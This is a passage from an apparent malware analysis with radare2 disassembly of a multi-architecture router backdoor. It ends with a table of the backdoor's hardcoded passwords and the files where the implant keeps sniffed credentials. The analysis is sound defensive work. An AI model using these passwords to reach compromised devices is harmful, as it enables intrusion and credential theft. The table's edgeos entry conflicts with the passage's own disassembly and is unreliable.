488b6c2418 mov rbp, qword [rsp + local_18h] ; [0x18:8]=0x40a234 sym._start │ ││││ 0x0040bb02 4c8b642420 mov r12, qword [rsp + local_20h] ; [0x20:8]=64 ; "@" 0x00000020 │ ││││ 0x0040bb07 4c8b6c2428 mov r13, qword [rsp + local_28h] ; [0x28:8]=0x200470 ; '(' │ ││││ 0x0040bb0c 4c8b742430 mov r14, qword [rsp + local_30h] ; [0x30:8]=0x38004000000000 ; '0' │ ││││ 0x0040bb11 4883c438 add rsp, 0x38
In this case the password is GZm7HF also. The file is '/etc/lps/lps' as well
edgeos (MIPS)
│││ ; XREFS: CALL 0x0040b7fc CALL 0x00425314 CALL 0x0040bacc CALL 0x004249ec CALL 0x00424c24 CALL 0x00425030 │ ││││ ; XREFS: CALL 0x0040ba10 CALL 0x0040b9e0 CALL 0x0040baac CALL 0x0041eb28 │ ────────> 0x0040a224 b0ffbd27 addiu sp, sp, -0x50 │ ││││ 0x0040a228 3800b2af sw s2, 0x38(sp) │ ││││ 0x0040a22c 4800123c lui s2, 0x48 │ ││││ 0x0040a230 00a04b8e lw t3, -0x6000(s2) │ ││││ 0x0040a234 48000a3c lui t2, 0x48 │ ││││ 0x0040a238 2c00abaf sw t3, 0x2c(sp) │ ││││ 0x0040a23c 47000b24 addiu t3, zero, 0x47 │ ││││ 0x0040a240 b89f4225 addiu v0, t2, -0x6048 │ ││││ 0x0040a244 b89f4ba1 sb t3, -0x6048(t2) │ ││││ 0x0040a248 5a000a24 addiu t2, zero, 0x5a │ ││││ 0x0040a24c 4800b6af sw s6, 0x48(sp) │ ││││ 0x0040a250 3c00b3af sw s3, 0x3c(sp) │ ││││ 0x0040a254 3400b1af sw s1, 0x34(sp) │ ││││ 0x0040a258 3000b0af sw s0, 0x30(sp) │ ││││ 0x0040a25c 4c00bfaf sw ra, 0x4c(sp) │ ││││ 0x0040a260 4400b5af sw s5, 0x44(sp) │ ││││ 0x0040a264 4000b4af sw s4, 0x40(sp) │ ││││ 0x0040a268 01004aa0 sb t2, 1(v0) │ ││││ 0x0040a26c 6d000a24 addiu t2, zero, 0x6d │ ││││ 0x0040a270 02004aa0 sb t2, 2(v0) │ ││││ 0x0040a274 37000a24 addiu t2, zero, 0x37 │ ││││ 0x0040a278 03004aa0 sb t2, 3(v0) │ ││││ 0x0040a27c 48000a24 addiu t2, zero, 0x48 │ ││││ 0x0040a280 4800093c lui t1, 0x48 │ ││││ 0x0040a284 21808000 move s0, a0 │ ││││ 0x0040a288 04004aa0 sb t2, 4(v0) │ ││││ 0x0040a28c 46000a24 addiu t2, zero, 0x46 │ ││││ 0x0040a290 0c00148e lw s4, 0xc(s0) │ ││││ 0x0040a294 48e83625 addiu s6, t1, -0x17b8 │ ││││ 0x0040a298 2120a000 move a0, a1 │ ││││ 0x0040a29c 05004aa0 sb t2, 5(v0) │ ││││ 0x0040a2a0 060040a0 sb zero, 6(v0) │ ││││ 0x0040a2a4 2188a000 move s1, a1 │ ││││ 0x0040a2a8 21284000 move a1, v0 │ ││││ 0x0040a2ac 63000224 addiu v0, zero, 0x63 │ ││││ 0x0040a2b0 0300c2a2 sb v0, 3(s6) │ ││││ 0x0040a2b4 65000224 addiu v0, zero, 0x65 │ ││││ 0x0040a2b8 2f000324 addiu v1, zero, 0x2f │ ││││ 0x0040a2bc 70000824 addiu t0, zero, 0x70 │ ││││ 0x0040a2c0 73000624 addiu a2, zero, 0x73 │ ││││ 0x0040a2c4 6c000724 addiu a3, zero, 0x6c │ ││││ 0x0040a2c8 0100c2a2 sb v0, 1(s6) │ ││││ 0x0040a2cc 74000224 addiu v0, zero, 0x74 │ ││││ 0x0040a2d0 0a00c8a2 sb t0, 0xa(s6) │ ││││ 0x0040a2d4 0800c3a2 sb v1, 8(s6) │ ││││ 0x0040a2d8 0700c6a2 sb a2, 7(s6) │ ││││ 0x0040a2dc 0600c8a2 sb t0, 6(s6) │ ││││ 0x0040a2e0 0500c7a2 sb a3, 5(s6) │ ││││ 0x0040a2e4 0200c2a2 sb v0, 2(s6) │ ││││ 0x0040a2e8 0c00c0a2 sb zero, 0xc(s6) │ ││││ 0x0040a2ec 0400c3a2 sb v1, 4(s6) │ ││││ 0x0040a2f0 0900c7a2 sb a3, 9(s6) │ ││││ 0x0040a2f4 0b00c6a2 sb a2, 0xb(s6) │ ││││ 0x0040a2f8 5015100c jal fcn.00405540 │ ││││ 0x0040a2fc 48e823a1 sb v1, -0x17b8(t1) │ ────────< 0x0040a300 12004014 bnez v0, 0x40a34c │ ││││ 0x0040a304 2800138e lw s3, 0x28(s0) │ ││││ 0x0040a308 4800023c lui v0, 0x48 │ ││││ 0x0040a30c 01000324 addiu v1, zero, 1 │ ││││ 0x0040a310 ac9f43ac sw v1, -0x6054(v0) │ ││││ 0x0040a314 01000224 addiu v0, zero, 1
The password and the file is the same than with Vyos/64
edgeos64 (MIPS)
Radare doesn't seem to work with this MIPS 64 file.
As a summary, the backdoor passwords are:
ARMv7 / ARMv6 = PRtest0
Vyos / Vyos64 = GZm7HF
Default = PRtestD
edgeos = PRtest0
edgeos64 = ??????
The files with the sniffed accounts are:
ARMv7 / ARMv6 = /etc/X11/.pr
Vyos / Vyos64 = '/etc/lps/lps'
Default = /etc/X11/.pr
edgeos = '/etc/lps/lps'
edgeos64 = ???
Angel Alonso-Parrizas